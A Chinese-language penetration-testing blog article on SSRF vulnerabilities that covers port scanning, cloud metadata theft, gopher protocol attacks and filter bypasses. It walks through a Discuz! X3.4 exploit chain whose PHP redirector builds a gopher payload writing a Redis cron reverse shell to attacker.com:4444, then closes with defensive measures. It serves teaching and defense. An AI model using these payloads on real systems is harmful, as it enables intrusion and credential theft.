当前位置: 首页 > article >正文

web渗透-SSRF漏洞深度解析与Discuz!论坛实战攻防

第1章. SSRF漏洞基础理论1.1 什么是SSRFSSRFServer-Side Request Forgery服务器端请求伪造是一种由攻击者构造请求由服务端发起请求的安全漏洞。通常情况下SSRF攻击的目标是从外网无法访问的内部系统[cit 。核心概念解析攻击者无法直接访问内网资源。服务器目标能够访问内网且存在SSRF漏洞。漏洞利用攻击者将服务器的资源权限、网络位置作为“跳板”向内网或其他受限资源发起请求。1.2 漏洞产生的根本原因SSRF漏洞的根本原因在于服务器提供了从外部获取远程资源的功能但未对用户提供的URL进行严格的验证和过滤。常见的易出现SSRF的业务场景图片加载与下载用户提交一个图片URL服务器下载该图片如头像上传、社交分享链接预览。Webhook功能用户填写一个回调URL服务器向该URL发送通知。文件处理通过URL处理文件如导入XML可能包含外部实体。数据库内置功能如PostgreSQL、MongoDB等提供的数据库外部数据连接功能。在线翻译/地图翻译网页内容或加载第三方地图资源。1.3 SSRF攻击的危害SSRF的危害程度取决于后端服务器的网络隔离强度以及漏洞本身的可控性内网资产探测与端口扫描攻击者可以利用漏洞对内部网络的IP和端口进行存活探测判断内网拓扑结构和服务开放情况。敏感信息泄露云主机元数据在AWS、阿里云等云环境中通过请求http://169.254.169.254/latest/meta-data/获取主机IAM临时凭证、密钥对等敏感信息这是SSRF攻击中最致命的一种场景。本地文件读取如果支持file://协议可直接读取服务器本地文件如/etc/passwd、Web源码。内网应用攻击利用SSRF作为跳板攻击内网中的Redis、MySQL、Elasticsearch、Hadoop等脆弱应用甚至实现远程代码执行RCE。绕过访问控制绕过IP白名单限制访问本应禁止的外部资源或管理后台。第2章. SSRF攻击技术实战指南本章将从实战角度出发详细介绍SSRF的发现、利用及绕过技术。2.1 SSRF漏洞的发现与确认2.1.1 寻找攻击面在渗透测试中需要重点关注Web应用中存在请求远程资源的参数常见参数名有?url,?path,?dest,?out,?view,?dir,?show,?file,?load,?uri,?data2.1.2 基础验证方法最简单的验证方法是使用Burp Suite拦截请求修改URL参数指向自己控制的服务器如VPS。攻击者服务器监听bashnc -lvnp 8000构造恶意请求httpPOST /check_availability HTTP/1.1 Host: target.com ... dateserverhttp://[攻击者IP]:8000如果在监听端接收到了来自目标服务器的请求则证明存在SSRF漏洞。2.2 内网资产探测与端口扫描在确认漏洞存在后攻击者通常首先对内网进行探测。2.2.1 探测存活主机将请求地址指向内网IP段如http://192.168.1.1。根据响应时间、错误信息或响应内容判断该IP是否存活。2.2.2 端口扫描通过尝试连接内网主机的不同端口根据返回的响应特征判断端口开放情况。端口状态判断方法端口开放返回200 OK或包含特定服务的Banner信息。端口关闭返回超时、Connection Refused错误或500 Internal Server Error。自动化扫描使用ffufbashseq 1 10000 ports.txt ffuf -w ./ports.txt -u http://target.com/ssrf -X POST -d urlhttp://127.0.0.1:FUZZ/ -fr Failed to connect2.3 云环境元数据信息窃取这是SSRF最严重危害之一。攻击者利用SSRF请求云服务商提供的特殊元数据地址。AWShttp://169.254.169.254/latest/meta-data/- 进一步访问/iam/security-credentials/rolename/获取临时凭证。Google Cloudhttp://metadata.google.internal/computeMetadata/v1/阿里云http://100.100.100.200/latest/meta-data/Azurehttp://169.254.169.254/metadata/instance?api-version2017-08-292.4 利用Gopher协议扩展攻击面当SSRF支持gopher://协议时其攻击力将成倍提升。gopher协议是一种信息查找系统它可以向指定IP和端口的TCP服务发送任意格式的数据流这使得攻击者可以像与服务交互一样发送恶意Payload。2.4.1 攻击Redis未授权访问Redis通常运行在内网且很多配置为无密码。利用Gopher可以向Redis发送命令写入Crontab反弹Shell或写入SSH公钥。2.4.2 攻击MySQL向MySQL的3306端口发送构造的认证和查询数据包。2.4.3 攻击FastCGI如果内网有PHP-FPM服务可以通过构造FastCGI协议数据包实现任意代码执行。2.5 绕过SSRF防御措施的艺术许多应用会采取一定的防护措施但往往可以被绕过。2.5.1 基于IP限制的绕过如果后端禁止了127.0.0.1或192.168.x.x可以使用以下技巧域名解析将域名指向内网IPlocaltest.me解析为127.0.0.1。URL格式变形十进制IP2130706433代表127.0.0.1。八进制IP0177.0.0.01。十六进制IP0x7f.0x0.0x0.0x1。省略写法127.0.1等同于127.0.0.1。使用Enclosed alphanumericsⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ。2.5.2 基于域名白名单的绕过如果后端只允许白名单域名如images.example.com可尝试利用子域名images.example.com.attack.com。利用URL解析差异http://expected.comevil.com使用符号。利用协议混淆http://evil.com#expected.com。2.5.3 利用302跳转这是最经典的绕过方式之一。如果后端只校验了第一次请求的URL是合法的如图片域名攻击者可以在自己的服务器上搭建一个返回302跳转的页面跳转目标指向内网IP。攻击者服务器index.php内容php?php header(Location: http://169.254.169.254/latest/meta-data/); ?SSRF请求http://attacker.com/index.php。第3章. 经典案例实战Discuz! X3.4 前台SSRF漏洞深度剖析理论结合实践我们通过分析2018年披露的经典Discuz! X3.4前台SSRF漏洞CVE-2018-19461来深入理解漏洞从产生到利用的完整链条。3.1 漏洞概述漏洞名称Discuz! X3.4 前台SSRF漏洞影响范围Git版本小于41eb5bb0a3a7且PHP版本5.3且php-curl版本7.54且运行在80端口的Discuz。漏洞文件/source/module/misc/misc_imgcropper.php漏洞特点未授权、前台触发。3.2 环境搭建与漏洞复现3.2.1 环境准备靶机Windows/Linux, Apache, PHP 7.0, Discuz X3.4 (存在漏洞的commit:a5c1b95dc4464ee3da0ebd4655d30867f85d6ae9)。攻击机Kali Linux (IP: 172.16.4.128)用于搭建跳转服务器。内网目标假设存在内网Redis服务器(172.16.4.159:6379)。3.2.2 复现步骤Step 1获取必要的Token访问论坛首页进入个人中心或随便访问一个需要交互的页面如home.php?modspacecpacpm获取formhash值。这是Discuz防止CSRF的令牌很多表单提交都需要它。Step 2构造攻击URL我们需要访问裁切图片的接口。关键参数是cutimg和picflag。picflag2告诉程序图片位于远程FTP服务器。cutimg本来应该是FTP上的图片路径但这里被我们控制。Step 3发起首次请求访问构造好的URL需包含formhashtexthttp://172.16.4.159/upload/misc.php?modimgcropperpicflag2imgcroppersubmit1cutimg//攻击者IP:80/..//upload/member.php%3fmod%3dlogging%26action%3dlogout%26referer%3d//c%2523%2540内网目标IP%26quickforward%3d1formhash[formhash]此处的cutimg内容看起来复杂其核心是希望服务器最终请求到攻击者IP并且携带一个精心构造的referer参数。3.3 代码审计——漏洞成因分析接下来我们从源代码层面解析为什么这个请求能奏效。3.3.1 漏洞起点misc_imgcropper.php漏洞位于source/module/misc/misc_imgcropper.php的第50行左右。php// 截取关键代码 if($_GET[picflag] 2) { $prefix $_G[setting][ftp][attachurl]; // 这里获取FTP附件URL前缀 } else { $prefix $_G[setting][attachurl]; } // 直接将用户输入的cutimg拼接在prefix后面没有任何过滤 $imgurl $prefix.$_GET[cutimg];当picflag2时$prefix通常是根目录/。此时$imgurl就变成了//攻击者IP/...的格式。3.3.2 核心函数dfsockopenImageCropper类在处理图片时会调用dfsockopen函数来获取远程图片内容。php// 进入Thumb方法最终调用到 dfsockopen function dfsockopen($url, ...) { // ... 省略 $parse parse_url($url); // 尝试解析URL if(!$parse) { // 如果parse失败尝试补全协议 $url http:// . $url; $parse parse_url($url); } // ... 后续使用curl或fsockopen发起请求 }对于//攻击者IP/...这样的URLparse_url能够成功解析出host为攻击者IP因此程序会认为这是一个合法的远程URL并对其发起请求。3.3.3 漏洞链的关键跳转现在服务器向攻击者IP发起了请求但请求的是/..//upload/member.php?...。攻击者需要在自己的服务器上配置好路由让这个请求能够被正确处理。攻击者服务器的upload/member.php内容php?php // 这个文件的作用就是获取请求中的referer参数并进行302跳转 $referer $_GET[referer]; // 这里获取到的是 //c%23%40内网目标IP header(Location: . $referer); // 直接跳转服务器收到了请求发现member.php?modloggingactionlogoutreferer//c%23%40172.16.4.159它会执行dreferer函数进行跳转。3.3.4 解析差异导致的绕过关键点来了Discuz的dreferer函数会对跳转的URL进行安全检查防止任意URL跳转漏洞。简化的安全逻辑获取referer参数值//c#172.16.4.159。使用parse_url解析该URL。检查解析出的host域名是否合法是否属于本站域名白名单。parse_url解析结果scheme: null (因为没有协议头)host:cparse_url认为这个地址的host是c因为#是锚点是用户信息分隔符但在没有协议的情况下parse_url的处理会混乱最终认定host是c。curl请求时的解析当curl真的去请求//c#172.16.4.159这个地址时它的解析规则与parse_url不同。它会认为这是在请求主机172.16.4.159路径是/用户名是c密码是空。由于parse_url解析出的host是cc显然不在站点的域名白名单中但它也没有点.。php$domainroot substr($reurl[host], strpos($reurl[host], .)1); // host是c没有.strpos返回falsesubstr返回空字符串结果$domainroot是空字符串。后续的检查发现$domainroot不在域名根白名单中时空字符串的检查结果为false导致最终没有覆盖$_G[referer]。因此dreferer函数返回了未经修改的恶意URL//c#172.16.4.159。3.4 深度利用从SSRF到内网Redis入侵现在Discuz服务器被302跳转引导去请求//c#172.16.4.159实际目标为172.16.4.159:80。但这仅仅是到达了内网主机的80端口。如果目标内网主机172.16.4.159开放的是Redis服务6379我们该怎么办3.4.1 二次跳转——协议转换这里就需要第一次提到的攻击者服务器进行二次跳转。攻击流程改造SSRF入口请求指向攻击者服务器member.php但referer参数指向攻击者的另一个跳转脚本例如ssrf.php。textcutimg//attacker.com/member.php?refererhttp://attacker.com/ssrf.php%3ftarget172.16.4.159第一跳member.php302跳转到http://attacker.com/ssrf.php?target172.16.4.159。第二跳ssrf.php——关键跳板php?php // ssrf.php 内容 $target $_GET[target]; // 172.16.4.159 // 构造Gopher协议Payload目的是向Redis写Cron任务 $gopher_payload urlencode(*3\r\n$3\r\nset\r\n$4\r\nkey1\r\n$64\r\n\n\n\n*/1 * * * * bash -i /dev/tcp/attacker.com/4444 01\n\n\n\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$16\r\n/var/spool/cron/\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$4\r\nroot\r\n*3\r\n$5\r\nsave\r\n); $full_url gopher:// . $target . :6379/_ . $gopher_payload; header(Location: . $full_url); ?最终攻击Discuz服务器跟随第二次302跳转向172.16.4.159的6379端口发送了Gopher协议数据包。该数据包被Redis解析执行向Crontab中写入了一条反弹Shell的任务。通过这种层层递进的跳转方式攻击者将一个HTTP协议的SSRF漏洞成功转化为针对内网非HTTP服务Redis的攻击最终实现了远程代码执行。第4章. 企业级SSRF漏洞防御体系构建了解攻击是为了更好地防御。企业应从代码、网络、云环境等多个层面构建纵深防御体系。4.1 代码层防御4.1.1 严格输入校验——白名单为王不要试图通过黑名单禁止127.0.0.1等来防御因为总有绕过方法。应使用白名单机制。协议白名单如果业务只需要HTTP则只允许http://和https://。坚决禁止file://,gopher://,dict://等危险协议。域名/IP白名单如果业务只需要访问特定域名如images.cdn.com则直接解析出域名并校验其是否在允许的列表中。4.1.2 URL解析规范化由于URL解析库之间的差异是绕过的主要手段应在代码中对用户输入的URL进行多重解析和校验。先使用parse_urlPHP等函数解析。对URL进行标准化防止利用..或//绕过。对最终要发起请求的IP进行校验确保不是内网IPRFC 1918、回环地址127.0.0.0/8、链路本地地址169.254.0.0/16等。4.1.3 禁用不必要的Follow跳转如果业务不需要跟随跳转获取最终资源应在发起请求的库中禁用follow_location。这能有效阻断通过302跳转进行的协议转换和IP绕过。4.2 网络层防御4.2.1 网络隔离在架构上Web应用所在的网络区域DMZ区应严格与核心内网区隔离。Web服务器不应具备直接访问内网管理后台、数据库服务器除非业务必须、缓存服务器如Redis的权限。4.2.2 出站流量控制在防火墙上或主机层面的安全组上配置严格的出站规则。默认拒绝配置防火墙策略默认为“出站拒绝”。白名单放行只允许Web服务器访问特定的外网IP/域名如业务需要调用的API。禁止其访问所有内网IP段。云上安全组在云环境中为Web服务器所在的安全组添加一条出站规则禁止访问169.254.169.254元数据服务器IP。4.3 云环境特定防护4.3.1 启用IMDSv2在AWS中默认的元数据服务是IMDSv1直接通过HTTP GET请求即可获取。IMDSv2 引入了会话控制要求先通过PUT请求获取Token再携带Token进行GET请求这能有效防御简单的SSRF攻击。4.3.2 使用元数据访问限制工具一些云服务商提供了额外的安全工具来限制对元数据服务的访问例如AWS的Metadata Access限制。4.4 应用安全与运维管理4.4.1 使用专业的Web应用防火墙WAFWAF能够检测并拦截常见的SSRF攻击Payload。例如Hostease提供的WAF方案可以识别出请求中的内网IP、元数据IP以及Gopher等危险协议并进行拦截。4.4.2 漏洞扫描与组件更新定期对应用进行安全扫描特别是针对使用的开源框架和CMS如Discuz!、XXL-JOB等。对于XXL-JOB这类存在历史SSRF漏洞的组件应及时升级到修复后的版本。Discuz!官方早已在Git中修复了该SSRF漏洞管理员应及时git pull更新代码。4.4.3 最小权限原则运行Web服务的用户应使用低权限用户如www-data不要使用root权限运行。即使SSRF漏洞配合其他漏洞实现了RCE低权限也能极大地限制攻击者的破坏范围。第5章. SSRF漏洞的自动化检测与监控5.1 基于ASPM的漏洞管理ASPM应用安全性能管理工具可以在运行时动态监测应用行为。例如听云ASPM当应用因SSRF漏洞发起恶意请求时ASPM可以记录完整的调用链和堆栈信息帮助开发人员快速定位漏洞代码位置并提供修复建议。5.2 日志监控与告警在运维侧应重点关注服务器的access.log和error.log。如果发现大量向169.254.169.254或内网IP段发起的请求应立即告警并排查。bash# 简单的日志排查命令 grep 169\.254\.169\.254 /var/log/nginx/access.log总结SSRF漏洞是OWASP Top 10中的常客其危害性随着企业上云而愈发严重。本文从SSRF的基础原理出发深入探讨了探测、利用、绕过等实战技术并以Discuz! X3.4前台SSRF漏洞为案例通过代码审计的方式剖析了漏洞成因及利用链的构造过程。通过这个案例可以看出一个看似不起眼的“获取远程图片”功能结合URL解析差异、302跳转、Gopher协议足以撬动整个内网的安全防线。对于防御者而言单一的安全措施往往难以奏效必须构建“代码网络运行时”的纵深防御体系。在代码层面实施严格的白名单校验在网络层面进行精细化的出站控制在云环境层面强化元数据服务防护并辅以专业的WAF和ASPM工具才能最大程度地降低SSRF漏洞带来的安全风险。

相关文章:

web渗透-SSRF漏洞深度解析与Discuz!论坛实战攻防

第1章. SSRF漏洞基础理论1.1 什么是SSRF?SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。通常情况下,SSRF攻击的目标是从外网无法访问的内部系统…...

Guohua Diffusion 作品集:中国风与现代艺术风格生成效果对比展

Guohua Diffusion 作品集:中国风与现代艺术风格生成效果对比展 最近在玩一个挺有意思的AI绘画模型,叫Guohua Diffusion。名字听起来就很“国风”,对吧?我一开始也以为它只能画点水墨山水、工笔花鸟。但实际用下来,发现…...

基于TI TMS320F28P550的HB100微波多普勒雷达传感器驱动移植与运动检测实战

基于TI TMS320F28P550的HB100微波多普勒雷达传感器驱动移植与运动检测实战 最近在做一个模拟自动门的项目,需要用到微波雷达来检测人体或物体的移动。我选用了常见的HB100微波多普勒雷达模块,搭配TI的TMS320F28P550开发板(立创开发板&#xf…...

深入解析Cotex-M中的MSP与PSP:双堆栈指针的奥秘与应用

1. Cortex-M双堆栈指针的底层逻辑 第一次接触Cotex-M处理器的开发者,往往会对R13寄存器同时对应两个堆栈指针感到困惑。这就像给你的电脑配了两块键盘,但任何时候只能激活其中一块。**MSP(主堆栈指针)和PSP(进程堆栈指…...

ChatGPT Plus涨价前必看:开发者如何用礼品卡锁定最后低价(附实操步骤)

ChatGPT Plus涨价前开发者必读:巧用礼品卡锁定低价订阅的终极指南 最近关于ChatGPT Plus即将全球统一价格的消息在开发者圈子里引起了不小的震动。作为一个每天依赖ChatGPT进行代码调试、文档生成和算法验证的工具,订阅费用的上涨确实会直接影响开发预算…...

Vue3+D3.js实战:构建可交互的企业股权穿透可视化图谱

1. 为什么选择Vue3D3.js构建股权穿透图 在企业数据可视化领域,股权穿透图一直是个硬骨头。传统方案要么灵活性不足,要么性能堪忧。去年我接手一个金融风控项目时,就遇到了这个难题——需要展示集团旗下7层控股结构,还要支持实时数…...

斯坦福 CS336 从零构建大模型 (2025 春) - 第十五讲:对齐(SFT、RLHF 与 DPO)

斯坦福 CS336 从零构建大模型 (2025 春) - 第十五讲:对齐(SFT、RLHF 与 DPO) 文章目录斯坦福 CS336 从零构建大模型 (2025 春) - 第十五讲:对齐(SFT、RLHF 与 DPO)一、监督微调(SFT)…...

Linux-【文件系统下】

一、引入"inode"概念文件 数据 属性 , 当我们使用 ls -l 的时候看到了除了文件名 , 还能看到文件的元数据 (属性)ls -l 读取存储在磁盘上的文件信息 , 然后显示出来其实这个信息除了通过这种方式来读取 &a…...

灵机一物AI智能电商小程序(已上线)-从零构建高可用智能电商客服:LangGraph+LlamaIndex+ES三层检索RAG系统实战|彻底解决大模型幻觉

作者:Maris5188文章摘要:电商场景下,传统关键词客服回复生硬、匹配度低,纯大模型直接应答又极易出现幻觉编造、记忆污染等致命问题,严重影响用户体验和品牌口碑。本文结合实际业务落地经验,手把手带你基于LangGraph工作…...

(118页PPT)DG1892HRBP人资体系规划方案(附下载方式)

篇幅所限,本文只提供部分资料内容,完整资料请看下面链接 (118页PPT)DG1892HRBP人资体系规划方案P116.pptx_工业4.0与智能制造技术路径资源-CSDN下载 资料解读:DG1892HRBP 人资体系规划方案 P116 详细资料请看本解读文…...

服务器及网站操作

云服务器 在计算机E盘的文件夹MySite中,已经写好了html文件。在阿里申请了的域名。现在想在腾讯云构建服务器,把MySite的文件迁移过去,使得网友可以访问。操作步骤如下: 腾讯云 轻量应用服务器 控制台 → 轻量应用服务器 → 你…...

用CatBoost - shap集成模型解锁分类任务的秘密

CatBoost-shap集成模型用于分类任务,对模型和变量用shap进行解释 Python 代码,自带数据集可以直接运行 所有图所见即所得在数据科学领域,理解模型的决策过程与构建高精度模型同样重要。今天咱们就来聊聊如何利用CatBoost - shap集成模型进行分…...

复现叠加态拉盖尔高斯光束:MATLAB 的奇妙之旅

MATLAB文章复现:叠加态拉盖尔高斯光束在光学领域,拉盖尔高斯光束(Laguerre - Gaussian beam)是一种非常重要的光束模式。而叠加态的拉盖尔高斯光束更是有着独特的性质和广泛的应用,今天咱们就来用 MATLAB 复现叠加态拉…...

无刷直流电机MRAS模型参考自适应控制算法仿真探秘

无刷直流电机的MRAS模型参考自适应控制算法,仿真模型 a). 当直流无刷电机的转动惯量由1.23*10-3kg.m2变为3.23*10-3kg.m和5.23*10-3kg.m时,双闭环控制和自适应控制的仿真结果如图所示(蓝线代表未加自适应控制的系统输出,红线代表加…...

探索大厂吸尘器背后的技术奥秘

某大厂吸尘器的原理图,PCB,AD格式的。 送配套源码。 无刷吸尘器方案。 BLDC最近捣鼓了一些有意思的东西,今天来和大家分享一下某大厂吸尘器的原理图、PCB(AD格式哦),还会送上配套源码,以及无刷吸…...

DL00618 - 基于YOLOv5的钢材表面缺陷检测含数据集处理

DL00618-基于YOLOv5的钢材表面缺陷检测含数据集处理 东北大学(NEU)表面缺陷数据集,收集了热轧带钢6种典型的表面缺陷,即轧内垢(RS)、斑块(Pa)、裂纹(Cr)、点蚀面(PS)、夹杂物(In)和划痕(Sc)。 该数据库包括1800张灰度图像:6种不同类型的典型表…...

基于比例谐振型自抗扰控制GI ADRC的谐波抑制仿真模型

基于比例谐振型自抗扰控制GI ADRC抑制谐波仿真模型。 抑制死区引起的五七次谐波,效果不错,提供资料。大家好!今天我想和大家分享一个关于谐波抑制的仿真模型,这个模型基于一种称为“广义自抗扰控制(Generalized Integr…...

Carsim与Matlab/Simulink联合仿真在四轮电动汽车转向失效容错控制中的应用

Carsim与matlab/simulink联合仿真,线控转向,四轮电动汽车转向失效容错控制模型,提供参考文献引言 随着电动汽车的普及,汽车转向系统的设计和优化变得越来越重要。特别是在转向失效的紧急情况下,车辆的稳定性控制和安全…...

COMSOL随机裂隙双重介质注浆数值模拟

COMSOL随机裂隙双重介质注浆数值模拟针对注浆过程中常用的裂隙与多孔介质耦合注浆问题 应用有限元计算软件COMSOL Multiphysics建立随机裂隙双重介质注浆注浆的数值模型 研究注浆中浆液在多孔介质和裂隙中流动扩散规律,并分析不同浆液粘度、注浆压力、多孔介质渗透…...

会玩桌球辅助线工具Pro版|安卓专用万能台球瞄准线软件

温馨提示:文末有联系方式软件核心功能:智能辅助瞄准线与延长线 本款台球辅助工具主打高精度图像识别技术,可实时生成精准的击球辅助线与目标球延长线,大幅提升瞄准效率与进球率,尤其适用于新手进阶与高手复盘分析。全面…...

COMSOL冻土热-水-力耦合模型

COMSOL冻土热-水-力耦合模型冻土这玩意儿在工程上可是个难啃的骨头,特别是涉及到热力-水力-力学三场耦合的时候。前几天有个搞青藏公路监测的老哥找我吐槽,说他们的冻土路基模型算着算着就发散,活像煮过头的面条。今天就拿COMSOL来盘盘这个耦…...

专业术语统计报告_电压源型直流输电系统的端口小信号模型及稳定性研究

专业术语统计报告_电压源型直流输电系统的端口小信号模型及稳定性研究 一、概要简析 【概要分析】 本文档《电压源型直流输电系统的端口小信号模型及稳定性研究》超用心地围绕研究主题展开了系统性探讨哦😜!文档总字符数足足有221344,其中中文…...

13. 【Blazor全栈开发实战指南】--实时通信:SignalR集成

一、SignalR的架构与适用场景 HTTP的"请求-响应"模式对于大多数场景足够好用,但有一类需求它天然不擅长——服务器主动推送数据给客户端。想象一下实时聊天应用:用户A发送消息后,用户B的界面应该立即出现这条消息,而不是…...

前端:第七章-布局与导航组件

第七章:布局与导航组件 🎯 本章目标:开发应用主布局组件、顶部导航栏和侧边导航菜单。 7.1 布局结构设计 7.1.1 布局结构图 ┌─────────────────────────────────────────────────────────┐ │ …...

如何在Dev-C++中配置Windows API?

在Dev-C中配置Windows API的步骤如下&#xff1a;创建新项目打开Dev-C → 选择「文件」→「新建」→「项目」→ 选择「Windows Application」模板包含头文件在源代码开头添加&#xff1a;#include <windows.h>配置链接器选择「工具」→「编译选项」在「编译器」标签页勾选…...

LangChain智能体开发:使用 SDK 记录用户反馈

LangSmith 使得将反馈附加到追踪记录变得容易。这些反馈可以来自用户、标注者、自动化评估器等&#xff0c;对于监控和评估应用程序至关重要。 使用 create_feedback() / createFeedback()在这里&#xff0c;我们将逐步介绍如何使用 SDK 记录反馈。 from langsmith import tr…...

Qwen3-14B-Int4-AWQ辅助C语言学习:从语法基础到指针精讲的智能辅导

Qwen3-14B-Int4-AWQ辅助C语言学习&#xff1a;从语法基础到指针精讲的智能辅导 1. 为什么需要AI辅助学习C语言 C语言作为计算机专业的核心课程&#xff0c;一直是许多初学者的"拦路虎"。传统学习方式存在几个明显痛点&#xff1a;教材概念抽象难懂、练习缺乏即时反…...

Z-Image-GGUF多场景落地:政务宣传图生成、乡村振兴视觉素材、非遗数字化呈现

Z-Image-GGUF多场景落地&#xff1a;政务宣传图生成、乡村振兴视觉素材、非遗数字化呈现 1. 项目简介&#xff1a;当AI绘图遇见公共文化服务 想象一下&#xff0c;一个乡镇的宣传干事&#xff0c;需要在三天内为即将举办的“丰收节”制作一批宣传海报、展板素材和线上推文配图…...

Phi-3 Forest Lab多场景:产品经理需求文档生成、PRD评审要点提示

Phi-3 Forest Lab多场景&#xff1a;产品经理需求文档生成、PRD评审要点提示 1. 引言&#xff1a;当产品经理遇见森林里的AI助手 想象一下这个场景&#xff1a;你是一个产品经理&#xff0c;手头有三个需求要梳理&#xff0c;下午还要开PRD评审会。你打开文档&#xff0c;面对…...

保姆级教程:CogVideoX-2b快速体验,从启动到生成视频全流程

保姆级教程&#xff1a;CogVideoX-2b快速体验&#xff0c;从启动到生成视频全流程 1. 准备工作&#xff1a;认识你的视频创作工具 CogVideoX-2b是智谱AI开源的一款强大文字生成视频模型&#xff0c;而CSDN专用版则针对AutoDL平台进行了深度优化。这个版本最大的特点是解决了原…...